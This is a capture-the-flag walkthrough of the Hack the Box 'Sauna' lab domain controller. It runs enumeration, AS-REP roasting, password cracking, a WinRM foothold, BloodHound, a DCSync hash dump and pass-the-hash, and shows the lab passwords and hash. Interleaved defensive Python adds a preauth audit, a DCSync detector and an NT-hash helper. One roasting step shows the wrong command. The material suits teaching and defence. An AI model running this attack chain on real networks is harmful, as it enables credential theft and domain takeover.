sauna.md


Hack the Box - Sauna

Machine IP: 10.10.10.175 - Windows

Add to DNS

10.10.10.175    egotistical-bank.local sauna sauna.egotistical-bank.local

Nmap

TCP All Ports

▶ nmap -Pn -sS -p- 10.10.10.175 -T4 --min-rate 1000 -oN surface.nmap

Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-15 09:39 IST
Nmap scan report for 10.10.10.175
Host is up (0.18s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49675/tcp open  unknown
49695/tcp open  unknown
49720/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 124.54 seconds

Open TCP Ports Service Version and Default Scripts

▶ nmap -sC -sV -p 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49673,49674,49675,49695,49720 10.10.10.175 -oN deep.nmap

Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-15 09:26 IST
Nmap scan report for 10.10.10.175
Host is up (0.18s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-04-15 10:56:16Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  msrpc         Microsoft Windows RPC
49695/tcp open  msrpc         Microsoft Windows RPC
49720/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 6h59m41s
| smb2-time: 
|   date: 2023-04-15T10:57:10
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 132.84 seconds
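Reading the scan: the open-port set (DNS, Kerberos, LDAP, SMB, kpasswd, global catalog) is the service signature of an Active Directory domain controller, SMB signing is required (so SMB relay is off the table), and the clock-skew host script result matters for everything Kerberos-related that follows, because Kerberos rejects authenticators whose timestamp is more than five minutes off (KRB_AP_ERR_SKEW); a skew of almost seven hours on a DC is a misconfigured time source. The parser below is an added example, not part of the writeup; it runs over a trimmed copy of the scan output above and extracts those facts. The DC_PORTS table and the five-minute limit are the example's own choices.

```python
import re

# Trimmed copy of the scan output above, embedded so the example runs offline.
NMAP_OUTPUT = """\
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-04-15 10:56:16Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 6h59m41s
| smb2-security-mode:
|   311:
|_    Message signing enabled and required
"""

PORT_RE = re.compile(r"^(\d+)/tcp\s+open\s+(\S+)\s*(.*)$")
SKEW_RE = re.compile(r"clock-skew:\s*(-?)(?:(\d+)h)?(?:(\d+)m)?(?:(\d+)s)?")

# Services that, seen together, mark a host as an AD domain controller (example's own table).
DC_PORTS = {53: "dns", 88: "kerberos", 389: "ldap", 445: "smb", 464: "kpasswd", 636: "ldaps", 3268: "gc-ldap"}
KERBEROS_MAX_SKEW_SECONDS = 5 * 60  # Windows default tolerance for Kerberos timestamps


def parse_open_ports(text):
    """Return {port: (service, version)} for every open TCP port line."""
    ports = {}
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports[int(m.group(1))] = (m.group(2), m.group(3).strip())
    return ports


def parse_skew_seconds(text):
    """Turn nmap's '6h59m41s' style clock-skew into signed seconds, or None if absent."""
    m = SKEW_RE.search(text)
    if not m:
        return None
    sign, h, mi, s = m.groups()
    total = int(h or 0) * 3600 + int(mi or 0) * 60 + int(s or 0)
    return -total if sign else total


def parse_domain(text):
    """Pull the AD domain from the LDAP banner; this scan's banner carries a stray '0.' suffix."""
    m = re.search(r"Domain:\s*([^,]+)", text)
    return re.sub(r"0\.$", "", m.group(1)) if m else None


def profile_host(text):
    """Summarise what the scan tells a defender (or a reviewer of the scan) about the host."""
    ports = parse_open_ports(text)
    roles = {DC_PORTS[p] for p in ports if p in DC_PORTS}
    skew = parse_skew_seconds(text)
    return {
        "open_ports": sorted(ports),
        "domain": parse_domain(text),
        "likely_domain_controller": {"dns", "kerberos", "ldap", "smb"} <= roles,
        "smb_signing_required": "Message signing enabled and required" in text,
        "clock_skew_seconds": skew,
        "kerberos_skew_exceeded": skew is not None and abs(skew) > KERBEROS_MAX_SKEW_SECONDS,
    }


if __name__ == "__main__":
    for key, value in profile_host(NMAP_OUTPUT).items():
        print(f"{key}: {value}")
```

The skew reported here (6h59m41s, i.e. 25181 seconds) is far outside the Kerberos window, so any Kerberos exchange with this DC only works from a clock that has been aligned to it; on the defensive side the same number is the finding: a DC whose time is not synchronised.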


HTTP

Home


Users


Fergus Smith
Shuan Coins
Sophie Driver
Bowie Taylor
Hugo Bear
Steven Kerb

LDAPSearch

Base DN (Distinguished Name)

▶ ldapsearch -H ldap://10.10.10.175 -x -s base namingcontexts


Subtree Attributes

▶ ldapsearch -H ldap://10.10.10.175 -b 'DC=EGOTISTICAL-BANK,DC=LOCAL' -s sub



Kerberos

Kerberos Authentication Attack

  • Identify valid users.
  • Create a wordlist of potential usernames using the names found earlier.

Validate Usernames

▶ kerbrute userenum --dc 10.10.10.175 -d egotistical-bank.local users.txt


administrator@egotistical-bank.local
fsmith@egotistical-bank.local

AS-REP Roasting

  • Find users who have Kerberos preauthentication disabled and get their TGT.
▶ kerbrute userenum --dc 10.10.10.175 -d egotistical-bank.local users.txt


Crack TGT

  • Crack the TGT obtained for user fsmith to get the password.
▶ john --format:krb5asrep ticket.hrb5 --wordlist=/usr/share/wordlists/rockyou.txt


fsmith:Thestrokes23
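What makes fsmith AS-REP roastable is a single bit in the account's userAccountControl attribute, DONT_REQ_PREAUTH (0x400000): with it set, the KDC hands out an AS-REP encrypted with the user's password-derived key to anyone who asks, and that blob is what john cracks above. The same LDAP subtree query used in the LDAPSearch section returns this attribute for every user, so the audit a defender runs is to decode the flag over an LDIF export and fix the accounts it flags (enable preauthentication, and give any account that genuinely needs it disabled a long random password). The script below is an added example, not part of the writeup: the LDIF entries are constructed to look like ldapsearch output, and only fsmith's flag reflects what the writeup found; the other accounts and all userAccountControl values are made up.

```python
import base64

# userAccountControl bits relevant to the audit (subset; values from the AD schema).
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x400000: "DONT_REQ_PREAUTH",
}

# Constructed LDIF in the shape of `ldapsearch -s sub` output. The attribute
# values are made up for this example; only fsmith's preauth flag matches the writeup.
SAMPLE_LDIF = """\
# constructed sample, not a real export
dn: CN=Fergus Smith,CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL
objectClass: user
sAMAccountName: fsmith
userAccountControl: 4260352

dn: CN=Jane Doe,CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL
objectClass: user
sAMAccountName: jdoe
userAccountControl: 66048

dn: CN=svc_example,CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL
objectClass: user
sAMAccountName: svc_example
userAccountControl: 4194848
"""


def parse_ldif(text):
    """Minimal LDIF reader: entries separated by blank lines, folded lines, base64 ('::') values."""
    entries, current, last_key = [], {}, None
    for raw in text.splitlines():
        if raw.startswith("#"):
            continue
        if not raw.strip():
            if current:
                entries.append(current)
            current, last_key = {}, None
            continue
        if raw.startswith(" ") and last_key:  # folded continuation of the previous value
            current[last_key][-1] += raw[1:]
            continue
        key, sep, value = raw.partition(":")
        if not sep:
            continue
        if value.startswith(":"):  # "attr:: <base64>" form
            value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
        current.setdefault(key, []).append(value.strip())
        last_key = key
    if current:
        entries.append(current)
    return entries


def decode_uac(value):
    """Return the set of named flags present in a userAccountControl integer."""
    uac = int(value)
    return {name for bit, name in UAC_FLAGS.items() if uac & bit}


def audit_preauth(text):
    """List enabled user accounts that do not require Kerberos preauthentication."""
    findings = []
    for entry in parse_ldif(text):
        if "user" not in entry.get("objectClass", []):
            continue
        flags = decode_uac(entry["userAccountControl"][0])
        if "DONT_REQ_PREAUTH" in flags and "ACCOUNTDISABLE" not in flags:
            findings.append((entry["sAMAccountName"][0], sorted(flags)))
    return findings


if __name__ == "__main__":
    for account, flags in audit_preauth(SAMPLE_LDIF):
        print(f"{account}: preauth not required ({', '.join(flags)})")
```

Run against a real export, the same function also surfaces the combinations that make the finding worse: DONT_EXPIRE_PASSWORD on a roastable account means the cracked password never rotates on its own, and PASSWD_NOTREQD means the account may have no password at all.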

SMB

Enumerate SMB Shares

  • Enumerate the shares available, which are shared directories or resources that can be accessed.
▶ crackmapexec smb 10.10.10.175 -u fsmith -p Thestrokes23 --shares



WINRM

Login

  • Check for Windows Remote Management login using the found credentials.
▶ crackmapexec winrm 10.10.10.175 -u fsmith -p Thestrokes23



Foothold

  • Login as user fsmith.
▶ evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23



Privilege Escalation

WinPEAS

  • Upload winPEASx64.exe to "Sauna".
  • Execute it.
*Evil-WinRM* PS C:\Users\FSmith\Documents> upload winPEASx64.exe


WinPEAS Output


  • Credentials: svc_loanmanager:Moneymakestheworldgoround!

BloodHound

  • Start neo4j as root.
▶ neo4j console
  • Start BloodHound.
▶ BloodHound --no-sandbox
  • Upload SharpHound.exe.
  • Launch SharpHound.exe.
▶ upload SharpHound.exe


  • Download the collected data.
*Evil-WinRM* PS C:\Users\FSmith\Documents> download 20230416073219_BloodHound.zip


  • Upload the zip to BloodHound.

  • Mark FSMITH@EGOTISTICAL-BANK.LOCAL and SVC_LOANMGR@EGOTISTICAL-BANK.LOCAL as owned.

  • Find Principals with DCSync Rights.


DCSync Attack - Impacket

▶ impacket-secretsdump egotistical-bank.local/svc_loanmgr@10.10.10.175
  • Password: Moneymakestheworldgoround! (found earlier).
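The BloodHound query shows who can DCSync; on the DC the act itself is visible as Security event 4662 with an access mask of 0x100 (control access) whose Properties field carries the replication control-access-right GUIDs, DS-Replication-Get-Changes (1131f6aa-9c07-11d1-f79f-00c04fc2dcd2) and DS-Replication-Get-Changes-All (1131f6ad-9c07-11d1-f79f-00c04fc2dcd2). Domain controllers request those rights from each other all day, so the alert condition is a subject that is not a DC machine account. The detector below is an added example, not part of the writeup: the events are constructed in the flattened key/value shape a SIEM export typically has, the SAUNA$ machine account name comes from the scan's host name, and the other subjects and values are made up. Event 4662 is only written when Directory Service Access auditing is enabled, so check that before relying on this.

```python
import re

# Control-access-right GUIDs that directory replication (and therefore DCSync) requires.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)

# Constructed 4662/4624 records; the Properties strings mimic the event's
# "%%7688 {guid} {guid}" layout, all values are made up for this example.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "SAUNA$", "SubjectDomainName": "EGOTISTICAL-BANK",
     "AccessMask": "0x100",
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "svc_loanmgr", "SubjectDomainName": "EGOTISTICAL-BANK",
     "AccessMask": "0x100",
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "jdoe", "SubjectDomainName": "EGOTISTICAL-BANK",
     "AccessMask": "0x100",
     "Properties": "%%7688 {bf967aba-0de6-11d0-a285-00aa003049e2}"},  # unrelated object access
    {"EventID": 4624, "SubjectUserName": "svc_loanmgr", "SubjectDomainName": "EGOTISTICAL-BANK"},
]


def replication_rights_in(event):
    """Names of the replication rights referenced in a 4662 Properties field."""
    guids = {g.lower() for g in GUID_RE.findall(event.get("Properties", ""))}
    return sorted(REPLICATION_RIGHTS[g] for g in guids & REPLICATION_RIGHTS.keys())


def detect_dcsync(events, dc_accounts):
    """Flag replication-right access by any subject that is not a known DC machine account."""
    known_dcs = {a.upper() for a in dc_accounts}
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662 or ev.get("AccessMask", "").lower() != "0x100":
            continue  # 0x100 = control access, the mask replication requests carry
        rights = replication_rights_in(ev)
        if not rights:
            continue
        if ev["SubjectUserName"].upper() in known_dcs:
            continue  # DCs legitimately replicate with each other
        alerts.append({"user": ev["SubjectUserName"],
                       "domain": ev.get("SubjectDomainName"),
                       "rights": rights})
    return alerts


if __name__ == "__main__":
    for alert in detect_dcsync(SAMPLE_EVENTS, {"SAUNA$"}):
        print(f"DCSync-style replication by {alert['domain']}\\{alert['user']}: {', '.join(alert['rights'])}")
```

The allow-list of DC machine accounts should be generated from the Domain Controllers OU rather than typed in, and the same alert is worth raising on a single right as well as the pair, since Get-Changes-All alone is enough to pull secrets.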

Pass the Hash Attack

▶ crackmapexec smb 10.10.10.175 -u administrator -H 823452073d75b9d1cf70ebdf86c7f98e


  • Use the NTLM hash twice instead of the "LANMAN:NTLM" pair.
▶ impacket-psexec egotistical-bank.local/administrator@10.10.10.175 -hashes 823452073d75b9d1cf70ebdf86c7f98e:823452073d75b9d1cf70ebdf86c7f98e

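Why the hash is reusable as-is: the 32 hex characters secretsdump prints are the NT hash, MD4 over the UTF-16LE encoding of the password, with no salt, so the value is the same on every domain and is itself the credential NTLM authentication proves possession of. impacket's -hashes option takes LMHASH:NTHASH; NTLMv2 never uses the LM half, which is why repeating the NT hash works, but the conventional placeholder is the LM hash of an empty password, aad3b435b51404eeaad3b435b51404ee. The code below is an added example, not part of the writeup or of impacket: it carries its own MD4 because hashlib on OpenSSL 3 builds commonly refuses "md4", and it builds the -hashes string from a bare NT hash.

```python
import struct


def _rol(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, written out because hashlib.new('md4') is often unavailable."""
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    bit_len = len(data) * 8
    data += b"\x80"
    data += b"\x00" * ((56 - len(data) % 64) % 64)
    data += struct.pack("<Q", bit_len)  # little-endian 64-bit message length
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    # (function, additive constant, rotation amounts, message-word order) per round
    rounds = [
        (f, 0x00000000, [3, 7, 11, 19], list(range(16))),
        (g, 0x5A827999, [3, 5, 9, 13], [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]),
        (h, 0x6ED9EBA1, [3, 9, 11, 15], [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]),
    ]
    for chunk in range(0, len(data), 64):
        x = struct.unpack("<16I", data[chunk:chunk + 64])
        s = [a, b, c, d]
        for func, const, shifts, order in rounds:
            for i, k in enumerate(order):
                t = (-i) % 4  # word rewritten this step: A, D, C, B, A, ...
                u, v, w = (t + 1) % 4, (t + 2) % 4, (t + 3) % 4
                s[t] = _rol((s[t] + func(s[u], s[v], s[w]) + x[k] + const) & 0xFFFFFFFF, shifts[i % 4])
        a, b, c, d = [(p + q) & 0xFFFFFFFF for p, q in zip((a, b, c, d), s)]
    return struct.pack("<4I", a, b, c, d)


# LM hash of an empty password: the placeholder for "no LM hash stored".
EMPTY_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"


def nt_hash(password: str) -> str:
    """NT hash as Windows stores it: MD4 over the UTF-16LE password, unsalted."""
    return md4(password.encode("utf-16-le")).hex()


def impacket_hashes(nt: str, lm: str = EMPTY_LM_HASH) -> str:
    """Build the LMHASH:NTHASH string that impacket's -hashes option expects."""
    if len(nt) != 32 or len(lm) != 32:
        raise ValueError("each hash must be 32 hex characters")
    return f"{lm.lower()}:{nt.lower()}"


if __name__ == "__main__":
    # RFC 1320 test vector and the NT hash of "password" (both well-known values).
    print("md4('abc')      =", md4(b"abc").hex())
    print("NT('password')  =", nt_hash("password"))
    print("-hashes value   =", impacket_hashes("823452073d75b9d1cf70ebdf86c7f98e"))
```

The absence of a salt is the defender's takeaway: once a DCSync-capable account leaks, every NT hash it can pull is a ready credential, which is why replication rights belong only to domain controllers and why the privileged accounts need rotating (the krbtgt account twice) after an incident like this.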